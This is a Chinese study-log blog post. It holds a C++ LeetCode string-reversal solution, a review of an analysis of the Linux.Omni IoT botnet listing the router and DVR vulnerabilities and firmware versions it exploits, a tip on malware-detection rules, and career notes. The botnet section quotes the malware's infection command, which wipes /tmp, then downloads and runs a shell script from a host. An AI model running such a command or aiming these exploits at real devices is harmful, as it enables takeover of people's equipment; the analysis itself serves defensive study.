【ARTS】01_06_左耳听风-20181217~1223
ARTS:Algrothm: leetcode算法题目Review: 阅读并且点评一篇英文技术文章Tip/Techni: 学习一个技术技巧Share: 分享一篇有观点和思考的技术文章Algorithm【leetcode】Reverse Stringhttps://leetcode.com/problems/reverse-string/1)problem编写一个以字符串作为输...
ARTS:
- Algrothm: leetcode算法题目
- Review: 阅读并且点评一篇英文技术文章
- Tip/Techni: 学习一个技术技巧
- Share: 分享一篇有观点和思考的技术文章
Algorithm
【leetcode】Reverse String
https://leetcode.com/problems/reverse-string/
1)problem
编写一个以字符串作为输入并逆转字符串的函数。
2)answer
字符串大于0,就从最末尾开始取值。
3)solution
#include "pch.h"
#include <stdio.h>
#include <string>
#include <iostream>
#include <algorithm>
using std::string;
class Solution {
public:
string reverseString(string s) {
string result = "";
for (int i =s.length()-1;i>=0 ; i--)
{
result += s.at(i);
}
return result;
}
};
int main()
{
// 使用内容
Solution nSolution;
nSolution.reverseString("abcdef");
}
Review
【漏洞挖掘】Linux.Omni IoT 僵尸网络恶意软件分析
1)场景
Linux下针对IoT威胁的分类和分析。
2)问题难点
使用什么方式对IOT设备进行攻击。
3)解决问题的方法
Linux.Omni因其感染库包含了许多漏洞(总共11种)
4)方法细节
利用的IoT设备漏洞
- Vacron
VACRON网络录像机中"board.cgi"参数存在代码注入的漏洞。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nNpDcvDL-1587916886818)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im03-740x351.png)]
- Netgear – CVE-2016-6277
通过对路由器“cgi-bin/”目录进行GET请求而进行的远程代码执行攻击。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-I8rhNtDC-1587916886830)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im04-740x270.png)]
- D-Link – OS-Command Injection via UPnP
IoTReaper使用的是hedwig.cgi参数cookie溢出的漏洞,Omni使用的则是UPnP端口漏洞。
Omni的POST请求如下:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5hn82kGi-1587916886833)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im05-740x280.png)]
我们可以找到对应的二进制命令:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EbOMMIfq-1587916886839)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im06-740x304.png)]
存在漏洞的固件版本是:
DIR-300 rev B – 2.14b01,
DIR-600 – 2.16b01,
DIR-645 – 1.04b01,
DIR-845 – 1.01b02,
DIR-865 – 1.05b03。
- CCTV-DVR
与“/language/Swedish”资源相关联,允许远程执行代码。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rZNWJveo-1587916886849)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im07-740x269.png)]
- D-Link – HNAP
通过CAPTCHA绕过登录,并允许外部攻击者执行远程代码。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SakUmtVk-1587916886851)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im08-740x272.png)]
D-Link路由器有此漏洞的版本:
DI-524 C1 3.23,
DIR-628 B2 1.20NA1.22NA,
DIR-655 A1 1.30EA
- TR-069 – SOAP
漏洞利用如下:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gay100gG-1587916886860)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im09-740x201.png)]
二进制中的指令:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bXc0SZyD-1587916886863)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im10-740x377.png)]
- Huawei Router HG532 – Arbitrary Command Execution
在华为HG532路由器中,可以通过修改HTTP请求来利用配置文件验证错误的漏洞。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WUgoM5Rs-1587916886867)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im11-740x271.png)]
此漏洞已在分析Okiru/Satori僵尸网络的文章中(Analysis of Linux.Okiru)被检测及分析。
- Netgear – Setup.cgi RCE
Netgear路由器DGN1000 1.1.00.48固件中存在允许远程执行代码而无需事先验证的漏洞。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RXqagWlu-1587916886873)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im12-740x340.png)]
- Realtek SDK
使用Realtek SDK和miniigd守护程序的不同设备都存在通过UPnP SOAP接口的命令注入漏洞。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sCDKLxor-1587916886874)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im13-740x351.png)]
- GPON
GPON路由器的最新漏洞
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FAZBwWEn-1587916886875)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im14-740x296.png)]
5)总结
尽管攻击方式多种多样, 在受感染设备上运行的命令是一致的:
cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}
下载的文件是bash脚本,它依据受感染设备的不同构架来下载样本。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zLXDToWo-1587916886881)(https://www.securityartwork.es/wp-content/uploads/2018/06/Omni_im15-740x54.png)]
Tip
【安全开发】恶意代码检查工具1
1)场景
网络安全设备报警,某台机器中毒。
2)问题难点
如何快速找到机器里的恶意代码相关进程、文件。
3)解决思路
通过搜索国内外恶意代码公开的分析报告,分析样本,提取行为特征。
4)方法细节
逆向分析收集到的样本,然后提取规则:
文件规则:文件路径、Yara规则
注册表:注册表路径、子项、类型、值
内存:内存特征码、内存类型、内存保护属性、内存块大小范围
遍历内存代码:
【恶意代码】恶意代码代码特征提取
https://www.cnblogs.com//17bdw/p/10181207.html
5)总结
只需要搞懂两个知识点:VirtualQueryEx使用、MEMORY_BASIC_INFORMATION 结构体中RegionSize字段的含义。
Share
【业务能力】极客时间-左耳听风-开篇词1
1)场景
利用技术变现思路。
2)问题难点
在长时间加班情况下,如何保持学习。
3)解决思路
觉得还是要从头到尾看完一本书,不容易被分神。
白天工作回家就不想动了。
4)方法细节
【技术思路】极客时间-左耳听风-开篇词1
https://www.cnblogs.com/17bdw/p/10183216.html
5)总结
用技术变现:
独立思考
保持学习力、洞察力
寻找合适的环境
具备动手能力。
关注技术付费点
善于提升经验
输出价值观
朋友圈
拥有技术领导力
更多推荐
所有评论(0)